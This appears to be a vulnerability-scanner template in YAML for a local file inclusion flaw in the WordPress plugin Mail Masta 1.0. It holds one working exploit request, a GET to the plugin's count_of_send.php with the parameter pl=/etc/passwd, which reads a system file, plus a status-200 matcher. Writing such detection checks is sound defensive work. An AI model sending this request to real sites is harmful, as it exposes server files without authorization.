name:
  - "WordPress Plugin Mail Masta 1.0 - Local File Inclusion"
url:
  - "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
method:
  - "GET"
data:
  - ""
matchers:
  - Status:
      - 200
  - Regex:
      - ""